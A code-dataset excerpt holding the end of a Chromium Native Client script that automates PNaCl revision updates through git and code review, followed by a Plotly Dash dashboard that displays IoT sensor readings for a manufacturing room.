branch.\n Ignores untracked paths.\"\"\"\n out = ExecCommand(['git', 'status', '--porcelain']).strip()\n if not out:\n return []\n out = out.split('\\n')\n return [f.strip() for f in out if not re.match('^\\?\\? (.*)$', f.strip())]\n\n\ndef SyncSources():\n ExecCommand(['gclient', 'sync'])\n\n\ndef GitCommitInfo(info='', obj=None, num=None, extra=[]):\n \"\"\"Commit information, where info is one of the shorthands in git_formats.\n obj can be a path or a hash.\n num is the number of results to return.\n extra is a list of optional extra arguments.\"\"\"\n # Shorthands for git's pretty formats.\n # See PRETTY FORMATS format: in `git help log`.\n git_formats = {\n '': '',\n 'hash': '%H',\n 'date': '%cI',\n 'author email': '%aE',\n 'subject': '%s',\n 'body': '%b',\n }\n cmd = ['git', 'log', '--format=format:%s' % git_formats[info]] + extra\n if num: cmd += ['-n'+str(num)]\n if obj: cmd += [obj]\n return ExecCommand(cmd).strip()\n\n\ndef GitCommitsSince(date):\n \"\"\"List of commit hashes since a particular date,\n in reverse chronological order.\"\"\"\n return GitCommitInfo(info='hash',\n extra=['--since=\"%s\"' % date]).split('\\n')\n\n\ndef GitFilesChanged(commit_hash):\n \"\"\"List of files changed in a commit.\"\"\"\n return GitCommitInfo(obj=commit_hash, num=1,\n extra=['--name-only']).split('\\n')\n\n\ndef GitChangesPath(commit_hash, path):\n \"\"\"Returns True if the commit changes a file under the given path.\"\"\"\n return any([\n re.search('^' + path, f.strip()) for f in\n GitFilesChanged(commit_hash)])\n\n\ndef GitBranchExists(name):\n return len(ExecCommand(['git', 'branch', '--list', name]).strip()) != 0\n\n\ndef GitCheckout(branch, force=False):\n \"\"\"Checkout an existing branch.\n force throws away local changes.\"\"\"\n ExecCommand(['git', 'checkout'] +\n (['--force'] if force else []) +\n [branch])\n\n\ndef GitCheckoutNewBranch(branch):\n \"\"\"Create and checkout a new git branch.\"\"\"\n ExecCommand(['git', 'checkout', '-b', branch, 'origin/master'])\n\n\ndef GitDeleteBranch(branch, force=False):\n \"\"\"Force-delete a branch.\"\"\"\n ExecCommand(['git', 'branch', '-D' if force else '-d', branch])\n\n\ndef GitAdd(file):\n ExecCommand(['git', 'add', file])\n\n\ndef GitCommit(message):\n with tempfile.NamedTemporaryFile() as tmp:\n tmp.write(message)\n tmp.flush()\n ExecCommand(['git', 'commit', '--file=%s' % tmp.name])\n\n\ndef UploadChanges():\n \"\"\"Upload changes, don't prompt.\"\"\"\n # TODO(jfb) Using the commit queue and avoiding git try + manual commit\n # would be much nicer. See '--use-commit-queue'\n return ExecCommand(['git', 'cl', 'upload', '--send-mail', '-f'])\n\n\ndef GitTry():\n return ExecCommand(['git', 'cl', 'try'])\n\n\ndef CommitMessageToCleanDict(commit_message):\n \"\"\"Extract and clean commit message fields that follow the NaCl commit\n message convention. 
Don't repeat them as-is, to avoid confusing our\n infrastructure.\"\"\"\n res = {}\n fields = [\n ['reviewers tbr', '\\s*TBR=([^\\n]+)', ''],\n ['reviewers', '\\s*R=([^\\n]+)', ''],\n ['review url', '\\s*Review URL: *([^\\n]+)', ''],\n ['bug', '\\s*BUG=([^\\n]+)', ''],\n ['test', '\\s*TEST=([^\\n]+)', ''],\n ]\n for key, regex, none in fields:\n found = re.search(regex, commit_message)\n if found:\n commit_message = commit_message.replace(found.group(0), '')\n res[key] = found.group(1).strip()\n else:\n res[key] = none\n res['body'] = commit_message.strip()\n return res\n\n\ndef SendEmail(user_email, out):\n if user_email:\n sys.stderr.write('\\nSending email to %s.\\n' % user_email)\n msg = email.mime.text.MIMEText(out)\n msg['Subject'] = '[PNaCl revision updater] failure!'\n msg['From'] = 'tool_revisions-bot@chromium.org'\n msg['To'] = user_email\n s = smtplib.SMTP('localhost')\n s.sendmail(msg['From'], [msg['To']], msg.as_string())\n s.quit()\n else:\n sys.stderr.write('\\nNo email address specified.')\n\n\ndef DryRun(out):\n sys.stdout.write(\"DRY RUN: \" + out + \"\\n\")\n\n\ndef Done(out):\n sys.stdout.write(out)\n sys.exit(0)\n\n\nclass CLInfo:\n \"\"\"Changelist information: sorted dictionary of NaCl-standard fields.\"\"\"\n def __init__(self, desc):\n self._desc = desc\n self._vals = collections.OrderedDict([\n ('hash', None),\n ('author email', None),\n ('date', None),\n ('subject', None),\n ('commits since', None),\n ('bug', None),\n ('test', None),\n ('review url', None),\n ('reviewers tbr', None),\n ('reviewers', None),\n ('body', None),\n ])\n def __getitem__(self, key):\n return self._vals[key]\n def __setitem__(self, key, val):\n assert key in self._vals.keys()\n self._vals[key] = str(val)\n def __str__(self):\n \"\"\"Changelist to string.\n\n A short description of the change, e.g.:\n 1c0ffee: (tom@example.com) Subject of the change.\n\n If the change is itself pulling in other changes from\n sub-repositories then take its relevant description and append it to\n the string. These sub-directory updates are also script-generated\n and therefore have a predictable format. 
e.g.:\n 1c0ff33: (tom@example.com) Subject of the change.\n | dead123: (dick@example.com) Other change in another repository.\n | beef456: (harry@example.com) Yet another cross-repository change.\n \"\"\"\n desc = (' ' + self._vals['hash'][:7] + ': (' +\n self._vals['author email'] + ') ' +\n self._vals['subject'])\n if GitChangesPath(self._vals['hash'], 'pnacl/COMPONENT_REVISIONS'):\n git_hash_abbrev = '[0-9a-fA-F]{7}'\n email = '[^@)]+@[^)]+\\.[^)]+'\n desc = '\\n'.join([desc] + [\n ' | ' + line for line in self._vals['body'].split('\\n') if\n re.match('^ *%s: \\(%s\\) .*$' % (git_hash_abbrev, email), line)])\n return desc\n\n\ndef FmtOut(tr_points_at, pnacl_changes, new_git_hash, err=[], msg=[]):\n assert isinstance(err, list)\n assert isinstance(msg, list)\n old_git_hash = tr_points_at['hash']\n changes = '\\n'.join([str(cl) for cl in pnacl_changes])\n bugs = '\\n'.join(sorted(list(set(\n ['BUG= ' + cl['bug'].strip() if cl['bug'] else '' for\n cl in pnacl_changes]) - set(['']))))\n reviewers = ', '.join(sorted(list(set(\n [r if '@' in r else r + '@chromium.org' for r in\n [r.strip() for r in\n (','.join([\n cl['author email'] + ',' +\n cl['reviewers tbr'] + ',' +\n cl['reviewers']\n for cl in pnacl_changes])).split(',')]\n if r != '']))))\n return (('*** ERROR ***\\n' if err else '') +\n '\\n\\n'.join(err) +\n '\\n\\n'.join(msg) +\n ('\\n\\n' if err or msg else '') +\n ('Update revision for PNaCl\\n\\n'\n 'Update %s -> %s\\n\\n'\n 'Pull the following PNaCl changes into NaCl:\\n%s\\n\\n'\n '%s\\n'\n 'R= %s\\n'\n 'TEST=git cl try\\n'\n '(Please LGTM this change and tick the \"commit\" box)\\n' %\n (old_git_hash, new_git_hash, changes, bugs, reviewers)))\n\n\ndef Main(args):\n args = ParseArgs(args)\n\n new_pnacl_revision = args.hash\n user_provided_hash = args.hash is not None\n if user_provided_hash:\n new_pnacl_revision = GitRevParse(new_pnacl_revision)\n\n tr_points_at = CLInfo('revision update points at PNaCl version')\n pnacl_changes = []\n msg = []\n\n orig_branch = GitCurrentBranch()\n if not args.dry_run and not args.ignore_branch:\n if orig_branch != 'master':\n raise Exception('Must be on branch master, currently on %s' % orig_branch)\n\n if not args.dry_run:\n status = GitStatus()\n if len(status) != 0:\n raise Exception(\"Repository isn't clean:\\n %s\" % '\\n '.join(status))\n\n try:\n if not args.dry_run:\n SyncSources()\n\n # The current revision file points at a specific PNaCl LLVM version. 
LLVM is\n # checked-in to the NaCl repository, but its head isn't necessarily the one\n # that we currently use in PNaCl.\n tr_points_at['hash'] = GetCurrentRevision()\n tr_points_at['date'] = GitCommitInfo(\n info='date', obj=tr_points_at['hash'], num=1)\n recent_commits = GitCommitsSince(tr_points_at['date'])\n tr_points_at['commits since'] = len(recent_commits)\n assert len(recent_commits) > 1\n\n if not user_provided_hash:\n # No update hash specified, take the latest commit.\n new_pnacl_revision = recent_commits[0]\n else:\n new_pnacl_revision_date = GitCommitInfo(\n info='date', obj=new_pnacl_revision, num=1)\n new_date = dateutilparser.parse(new_pnacl_revision_date)\n old_date = dateutilparser.parse(tr_points_at['date'])\n if new_date <= old_date:\n Done(FmtOut(tr_points_at, pnacl_changes, new_pnacl_revision,\n err=[\"Can't update to git hash %s committed on %s: \"\n \"the current PNaCl revision's current hash %s \"\n \"committed on %s is more recent.\" %\n (new_pnacl_revision, new_pnacl_revision_date,\n tr_points_at['hash'], tr_points_at['date'])]))\n\n # Find the commits changing PNaCl files that follow the previous PNaCl\n # revision pointer.\n pnacl_pathes = ['pnacl/', 'toolchain_build/']\n pnacl_hashes = list(set(reduce(\n lambda acc, lst: acc + lst,\n [[cl for cl in recent_commits[:-1] if\n GitChangesPath(cl, path)] for\n path in pnacl_pathes])))\n for hash in pnacl_hashes:\n cl = CLInfo('PNaCl change ' + hash)\n cl['hash'] = hash\n for i in ['author email', 'date', 'subject']:\n cl[i] = GitCommitInfo(info=i, obj=hash, num=1)\n for k,v in CommitMessageToCleanDict(\n GitCommitInfo(info='body', obj=hash, num=1)).iteritems():\n cl[k] = v\n pnacl_changes.append(cl)\n\n # Hashes aren't ordered chronologically, make sure the changes are.\n pnacl_changes.sort(key=lambda x: dateutilparser.parse(x['date']))\n\n # Remove commits later than the current commit or the user-provided one.\n cutoff_date = dateutilparser.parse(GitCommitInfo(\n info='date', obj=new_pnacl_revision, num=1))\n pnacl_changes = [cl for cl in pnacl_changes if\n dateutilparser.parse(cl['date']) <= cutoff_date]\n\n if len(pnacl_changes) == 0:\n Done(FmtOut(tr_points_at, pnacl_changes, new_pnacl_revision,\n msg=['No PNaCl change since %s on %s.' 
%\n (tr_points_at['hash'], tr_points_at['date'])]))\n\n if not user_provided_hash:\n # Take the latest commit that touched PNaCl.\n new_pnacl_revision = pnacl_changes[-1]['hash']\n\n new_branch_name = 'pnacl-revision-update-to-%s' % new_pnacl_revision\n if GitBranchExists(new_branch_name):\n # TODO(jfb) Figure out if tryjobs succeeded, checkout the branch and land.\n raise Exception(\"Branch %s already exists, the change hasn't \"\n \"landed yet.\\nPlease check trybots and land it \"\n \"manually.\" % new_branch_name)\n\n if args.dry_run:\n DryRun(\"Would check out branch: \" + new_branch_name)\n DryRun(\"Would update PNaCl revision to: %s\" % new_pnacl_revision)\n else:\n GitCheckoutNewBranch(new_branch_name)\n try:\n SetCurrentRevision(new_pnacl_revision)\n for f in GetRevisionPackageFiles():\n GitAdd(f)\n GitCommit(FmtOut(tr_points_at, pnacl_changes, new_pnacl_revision))\n\n upload_res = UploadChanges()\n msg += ['Upload result:\\n%s' % upload_res]\n try_res = GitTry()\n msg += ['Try result:\\n%s' % try_res]\n\n GitCheckout(orig_branch, force=False)\n except:\n GitCheckout(orig_branch, force=True)\n raise\n\n Done(FmtOut(tr_points_at, pnacl_changes, new_pnacl_revision, msg=msg))\n\n except SystemExit as e:\n # Normal exit.\n raise\n\n except (BaseException, Exception) as e:\n # Leave the branch around, if any was created: it'll prevent next\n # runs of the cronjob from succeeding until the failure is fixed.\n out = FmtOut(tr_points_at, pnacl_changes, new_pnacl_revision, msg=msg,\n err=['Failed at %s: %s' % (datetime.datetime.now(), e)])\n sys.stderr.write('%s\\n' % e)\n if not args.dry_run:\n SendEmail(args.email, out)\n raise\n\n return 0\n\n\nif __name__ == '__main__':\n sys.exit(Main(sys.argv[1:]))\n", "repo_name": "kiwibrowser/src", "sub_path": "native_client/build/update_pnacl_tool_revisions.py", "file_name": "update_pnacl_tool_revisions.py", "file_ext": "py", "file_size_in_byte": 17277, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2475, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sys.stdout.write", "line_number": 16, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path", "line_number": 23, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 31, "usage_type": "call"}, {"api_name": "argparse.RawDescriptionHelpFormatter", "line_number": 32, "usage_type": "attribute"}, {"api_name": "getpass.getuser", "line_number": 68, "usage_type": "call"}, {"api_name": "subprocess.check_output", "line_number": 93, "usage_type": "call"}, {"api_name": "subprocess.STDOUT", "line_number": 93, "usage_type": "attribute"}, {"api_name": "subprocess.CalledProcessError", "line_number": 94, "usage_type": "attribute"}, {"api_name": "sys.stderr.write", "line_number": 95, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 95, "usage_type": "attribute"}, {"api_name": "sys.executable", "line_number": 101, "usage_type": "attribute"}, {"api_name": "sys.executable", 
"line_number": 107, "usage_type": "attribute"}, {"api_name": "sys.executable", "line_number": 114, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 118, "usage_type": "call"}, {"api_name": "os.path", "line_number": 118, "usage_type": "attribute"}, {"api_name": "re.match", "line_number": 137, "usage_type": "call"}, {"api_name": "re.search", "line_number": 181, "usage_type": "call"}, {"api_name": "tempfile.NamedTemporaryFile", "line_number": 212, "usage_type": "call"}, {"api_name": "re.search", "line_number": 242, "usage_type": "call"}, {"api_name": "sys.stderr.write", "line_number": 254, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 254, "usage_type": "attribute"}, {"api_name": "email.mime.text.mime.text.MIMEText", "line_number": 255, "usage_type": "call"}, {"api_name": "email.mime.text.mime", "line_number": 255, "usage_type": "attribute"}, {"api_name": "email.mime.text", "line_number": 255, "usage_type": "name"}, {"api_name": "smtplib.SMTP", "line_number": 259, "usage_type": "call"}, {"api_name": "sys.stderr.write", "line_number": 263, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 263, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 267, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 267, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 271, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 271, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 272, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 279, "usage_type": "call"}, {"api_name": "email.mime.text", "line_number": 316, "usage_type": "name"}, {"api_name": "re.match", "line_number": 319, "usage_type": "call"}, {"api_name": "email.mime.text", "line_number": 319, "usage_type": "name"}, {"api_name": "dateutil.parser.parse", "line_number": 396, "usage_type": "call"}, {"api_name": "dateutil.parser", "line_number": 396, "usage_type": "name"}, {"api_name": "dateutil.parser.parse", "line_number": 397, "usage_type": "call"}, {"api_name": "dateutil.parser", "line_number": 397, "usage_type": "name"}, {"api_name": "dateutil.parser.parse", "line_number": 425, "usage_type": "call"}, {"api_name": "dateutil.parser", "line_number": 425, "usage_type": "name"}, {"api_name": "dateutil.parser.parse", "line_number": 428, "usage_type": "call"}, {"api_name": "dateutil.parser", "line_number": 428, "usage_type": "name"}, {"api_name": "dateutil.parser.parse", "line_number": 431, "usage_type": "call"}, {"api_name": "dateutil.parser", "line_number": 431, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 480, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 480, "usage_type": "attribute"}, {"api_name": "sys.stderr.write", "line_number": 481, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 481, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 490, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 490, "usage_type": "attribute"}]} +{"seq_id": "19138536222", "text": "from operator import index\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport pandas as pd\nimport numpy as np\nfrom dash.dependencies import Output, Input\nimport dash_daq as daq\nimport plotly.express as px\nimport ast \n\n#data pre-processing-------------------------------------------------------------------------------------------------------------------------\n\ndata = 
pd.read_csv(\"/home/bhaskar/IOT/IOT/IOT-devAshwini/dataBase/room01DB.csv\")\nmasterData = pd.read_csv(\"https://raw.githubusercontent.com/BhaskarTelecom/IOT/devAshwini/dataBase/masteDB.csv\")\n\n\na = np.linspace(20,25,646)\ntrial_column = pd.concat([data,pd.Series(a)],axis=1)\n\n\nmask = pd.notna(trial_column[\"SST0100\"])\nvalues = trial_column[\"SST0100\"][mask]\n\n\ntime = trial_column[\"time\"][mask]\ntime = pd.to_datetime(time)\n\n\nunitCountMask = pd.notna(data[\"SIR0100\"])\nunitCount = data[\"SIR0100\"][unitCountMask]\ntime1 = data[\"time\"][unitCountMask]\n\n\noutput = pd.DataFrame()\nfor item in unitCount:\n item = ast.literal_eval(item)\n output = output.append(item, ignore_index=True)\n\n\n\nx = pd.to_datetime(time1)\nx = pd.Series.to_frame(x)\n\nx.reset_index(drop=True, inplace=True)\n\ndf = pd.DataFrame()\noutput[\"Time\"] = x\n#print(output)\n\n#bar chart definition ---------------------------------------------------------------------------------------------------------------------\n#fig = px.bar(output,y=[\"True\",\"False\"],x=\"Time\",color_discrete_map={\"True\":\"green\",\"False\":\"red\"})\n#y=[output[\"True\"],output[\"False\"]],labels={output[\"True\"]:\"true\",output[\"False\"]:\"False\"}\n\n#web layout ---------------------------------------------------------------------------------------------------------------------------------\nexternal_stylesheets = [\n {\n \"href\": \"https://fonts.googleapis.com/css2?\"\n \"family=Lato:wght@400;700&display=swap\",\n \"rel\": \"stylesheet\",\n },\n { \"href\" : \"https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css\", \n \"rel\" : \"stylesheet\",\n \"integrity\" :\"sha384-EVSTQN3/azprG1Anm3QDgpJLIm9Nao0Yz1ztcQTwFspd3yD65VohhpuuCOmLASjC\",\n \"crossorigin\": \"anonymous\"\n },\n 'https://codepen.io/chriddyp/pen/bWLwgP.css'\n]\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets)\nserver = app.server\napp.title = \"Smart Manufacturing Systems!\"\n\napp.layout = html.Div([\n dcc.Interval(\n id='my-interval',\n disabled=False,\n interval=1*1000,\n n_intervals=0,\n max_intervals=-1\n ),\n html.Div(\n children=[\n html.P(children=\"🏭\", className=\"header-emoji\"),\n html.H1(\n children=\"Smart Manufacturing System\", className=\"header-title\"\n ),\n ],\n className=\"header\"\n ),\n html.Div(\n children=[\n html.Div(\n children=[\n html.Div(children=\"Room\", className=\"menu-title\"),\n dcc.Dropdown(\n id=\"room-filter\",\n options=[\n {\"label\": \"Room 1\", \"value\": \"Room 1\"}\n \n ],\n value=\"Room 1\",\n clearable=False,\n className=\"dropdown\",\n ), \n ]\n ),\n html.Div(\n children=[\n html.Div(children=\"Type of Sensor\", className=\"menu-title\"),\n dcc.Dropdown(\n id=\"sensor-filter\",\n options=[\n {\"label\":sensorType , \"value\": sensorID}\n for (sensorType,sensorID) in [(\"Soldering Station Temp\",\"SST0100\"),(\"Pressure\",\"SPS0100\")]\n \n ],\n value=\"SST0100\",\n clearable=False,\n className=\"dropdown\",\n ), \n ]\n )\n ],\n className=\"menu\"\n ),\n html.Div(\n children=[\n html.Div(\n children=[\n html.Div(\n daq.Thermometer(\n id='my-thermometer',\n label=\"Room Temperature\",\n value=22,\n min=15,\n max=35,\n showCurrentValue=True,\n units=\"°C\",\n style={\n 'margin-bottom': '5%'\n },\n className=\"temp-widget\",\n )\n ),\n html.Div(\n daq.Gauge(\n id='my-gauge',\n label=\"Relative Room Humidity\",\n value=60,\n max=100,\n min=0,\n units=\"%\",\n showCurrentValue=True,\n className=\"gauge\",\n ), \n ), \n ],\n className=\"col-md-3 left-box\",\n ), \n html.Div(\n 
children=[\n html.Div(\n children=dcc.Graph(\n id=\"chart-1\",\n config={\"displayModeBar\": False},\n ),\n className=\"card\",\n ),\n html.Div(\n children=dcc.Graph(\n id=\"chart-2\",\n config={\"displayModeBar\": False},\n ),\n className=\"card\",\n ),\n ],\n className=\"col-md-6 wrapper\",\n ),\n html.Div(\n children=[\n html.Div(\n html.P(\n id=\"humidity-act\",\n children=['Humidity Actuator:']\n ),\n className=\"card right\" \n ),\n html.Div(\n html.P(\n id=\"temp-act\",\n children=['Temperature Actuator:']\n ),\n className=\"card right\" \n ),\n html.Div(\n html.P(\n id=\"osc-eqp\",\n children=['Oscillator Equipment:']\n ),\n className=\"card right\" \n ),\n html.Div(\n html.P(\n id=\"cb-eqp\",\n children=['init']\n ),\n className=\"card right\" \n ),\n html.Div(\n [\n html.H6(\"Test Bench\"),\n html.Table(\n id=\"tb-eqp\",\n children=[\"init\"],\n className=\"table table-striped table-hover\" \n )\n \n ],className=\"card right\"\n ),\n ], className=\"col-md-3 right-box\"\n )\n ],className=\"row\"\n ),\n ]\n)\n\n#------------------------------------------------------------------------------------------------------------------\n# Humidity Actuator\n\n@app.callback(\n Output(\"humidity-act\",\"children\"),\n Input('my-interval','n_intervals')\n)\n\ndef update_humidity_act_card(n_intervals):\n \n data = pd.read_csv(\"/home/bhaskar/IOT/IOT/IOT-devAshwini/dataBase/room01DB.csv\")\n sensorID = 'AHA0100'\n temp_mask = pd.notna(data[sensorID])\n \n return [html.Span(\"Humidity Actuator: \"+data[sensorID][temp_mask].iloc[-1])]\n\n#------------------------------------------------------------------------------------------------------------------\n# Temperature Actuator\n\n@app.callback(\n Output(\"temp-act\",\"children\"),\n Input('my-interval','n_intervals')\n)\n\ndef update_temp_act_card(n_intervals):\n \n data = pd.read_csv(\"/home/bhaskar/IOT/IOT/IOT-devAshwini/dataBase/room01DB.csv\")\n sensorID = 'ARA0100'\n temp_mask = pd.notna(data[sensorID])\n \n return [html.Span(\"Temperature Actuator: \"+data[sensorID][temp_mask].iloc[-1])]\n\n#------------------------------------------------------------------------------------------------------------------\n# Oscillator Equipment\n\n@app.callback(\n Output(\"osc-eqp\",\"children\"),\n Input('my-interval','n_intervals')\n)\ndef update_osc_card(n_intervals):\n \n sensorID = 'EOS0100'\n data = pd.read_csv(\"/home/bhaskar/IOT/IOT/IOT-devAshwini/dataBase/room01DB.csv\")\n temp_mask = pd.notna(data[sensorID])\n \n return [html.Span(\"Oscilloscope: \"+data[sensorID][temp_mask].iloc[-1])]\n\n#------------------------------------------------------------------------------------------------------------------\n# Test Bench Equipment\n\n@app.callback(\n Output(\"tb-eqp\",\"children\"),\n Input('my-interval','n_intervals')\n)\ndef update_test_bench_card(n_intervals):\n \n sensorID = 'ETB0100'\n data = pd.read_csv(\"/home/bhaskar/IOT/IOT/IOT-devAshwini/dataBase/room01DB.csv\")\n \n tb_mask = pd.notna(data[sensorID])\n test_bench_dict = ast.literal_eval(data[sensorID][tb_mask].iloc[-1])\n \n \n \n return [html.Table(\n [ \n html.Tr(\n [\n html.Th(\"Zero\"),\n html.Th(\"Span\"),\n ],className=\"text-center\"\n ),\n html.Tr(\n [\n html.Td(\"Voltage: \"+str(round(test_bench_dict[\"minValueVolt\"],2))+\"V\",className=\"text-center\"),\n html.Td(\"Voltage: \"+str(round(test_bench_dict[\"maxValueVolt\"],2))+\"V\",className=\"text-center\")\n ] \n ),\n html.Tr(\n [\n html.Td(\"Current: 
\"+str(round(test_bench_dict[\"minValueCurr\"],2))+\"mA\",className=\"text-center\"),\n html.Td(\"Current: \"+str(round(test_bench_dict[\"maxValueCurr\"],2))+\"mA\",className=\"text-center\")\n ]\n )\n ]\n )\n ]\n\n#------------------------------------------------------------------------------------------------------------------\n# Conveyor Belt\n\n@app.callback(\n Output(\"cb-eqp\",\"children\"),\n Input('my-interval','n_intervals')\n)\ndef update_conveyor_belt_card(n_intervals):\n \n sensorID = 'ECB0100'\n data = pd.read_csv(\"/home/bhaskar/IOT/IOT/IOT-devAshwini/dataBase/room01DB.csv\")\n temp_mask = pd.notna(data[sensorID])\n \n return [html.Span(\"Conveyor Belt : \"+data[sensorID][temp_mask].iloc[-1])]\n\n#------------------------------------------------------------------------------------------------------------------\n# Temperature Sensor\n\n@app.callback(\n Output('my-thermometer', 'value'),\n [Input('my-interval','n_intervals')]\n)\ndef update_thermometer(value):\n\n data = pd.read_csv(\"/home/bhaskar/IOT/IOT/IOT-devAshwini/dataBase/room01DB.csv\")\n temp_mask = pd.notna(data['SRT0100'])\n \n return data['SRT0100'][temp_mask].iloc[-1]\n\n#------------------------------------------------------------------------------------------------------------------\n# Humidity Sensor\n\n@app.callback(\n Output('my-gauge', 'value'),\n [Input('my-interval','n_intervals')]\n)\ndef update_gauge(value):\n\n data = pd.read_csv(\"/home/bhaskar/IOT/IOT/IOT-devAshwini/dataBase/room01DB.csv\")\n humidity_mask = pd.notna(data[\"SHS0100\"])\n\n return data['SHS0100'][humidity_mask].iloc[-1]\n\n#------------------------------------------------------------------------------------------------------------------\n# Dropdown Sensor graph\n\n@app.callback(\n [Output(\"chart-1\",\"figure\"),\n Output(\"chart-2\",\"figure\")],\n [Input('my-interval','n_intervals'),\n Input('sensor-filter','value')]\n)\ndef update_graphs(figure,sensorID): \n \n data = pd.read_csv(\"/home/bhaskar/IOT/IOT/IOT-devAshwini/dataBase/room01DB.csv\")\n \n sensorMask = pd.notna(data[sensorID])\n \n real_time = data[\"time\"][sensorMask]\n real_time = pd.to_datetime(real_time)\n\n unitCountMask = pd.notna(data[\"SIR0100\"])\n unitCount = data[\"SIR0100\"][unitCountMask]\n\n time1 = data[\"time\"][unitCountMask]\n\n\n output = pd.DataFrame()\n for item in unitCount:\n item = ast.literal_eval(item)\n output = output.append(item, ignore_index=True)\n\n\n\n x = pd.to_datetime(time1)\n x = pd.Series.to_frame(x)\n\n x.reset_index(drop=True, inplace=True)\n\n df = pd.DataFrame()\n output[\"Time\"] = x\n\n if(sensorID==\"SST0100\"):\n sensor_graph_title = \"Soldering Station Temperature (°C)\"\n elif (sensorID == \"SPS0100\"):\n sensor_graph_title = \"Output Pressure Value (kg)\"\n \n sensorGraph = {\n \"data\": [\n {\n \"x\": real_time,\n \"y\": data[sensorID][sensorMask],\n \"type\": \"lines\",\n \"hovertemplate\": \"%{y:.2f}\",\n },\n ],\n \"layout\": {\n \"title\": {\n \"text\": sensor_graph_title,\n \"x\": 0.05,\n \"xanchor\": \"left\",\n },\n \"xaxis\": {\"fixedrange\": False},\n \"yaxis\": {\"ticksufix\": \"C\", \"fixedrange\": False},\n \"colorway\": [\"#17B897\"],\n },\n }\n\n fig = px.bar(output,y=[\"True\",\"False\"],x=\"Time\",color_discrete_map={\"True\":\"green\",\"False\":\"red\"})\n\n return sensorGraph,fig\n\n\nif __name__ == \"__main__\":\n app.run_server(debug=False,port=5055)\n\n\n\n\n\n", "repo_name": "BhaskarTelecom/IOT", "sub_path": "dash/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 14646, 
"program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pandas.read_csv", "line_number": 14, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 18, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 19, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 19, "usage_type": "call"}, {"api_name": "pandas.notna", "line_number": 22, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 27, "usage_type": "call"}, {"api_name": "pandas.notna", "line_number": 30, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 35, "usage_type": "call"}, {"api_name": "ast.literal_eval", "line_number": 37, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 42, "usage_type": "call"}, {"api_name": "pandas.Series.to_frame", "line_number": 43, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 43, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 47, "usage_type": "call"}, {"api_name": "dash.Dash", "line_number": 69, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 73, "usage_type": "call"}, {"api_name": "dash_core_components.Interval", "line_number": 74, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 81, "usage_type": "call"}, {"api_name": "dash_html_components.P", "line_number": 83, "usage_type": "call"}, {"api_name": "dash_html_components.H1", "line_number": 84, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 90, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 92, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 94, "usage_type": "call"}, {"api_name": "dash_core_components.Dropdown", "line_number": 95, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 107, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 109, "usage_type": "call"}, {"api_name": "dash_core_components.Dropdown", "line_number": 110, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 126, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 128, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 130, "usage_type": "call"}, {"api_name": "dash_daq.Thermometer", "line_number": 131, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 145, "usage_type": "call"}, {"api_name": "dash_daq.Gauge", "line_number": 146, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 160, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 162, "usage_type": "call"}, {"api_name": "dash_core_components.Graph", "line_number": 163, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 169, "usage_type": "call"}, {"api_name": "dash_core_components.Graph", "line_number": 170, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 179, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 181, "usage_type": "call"}, {"api_name": "dash_html_components.P", "line_number": 182, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 188, 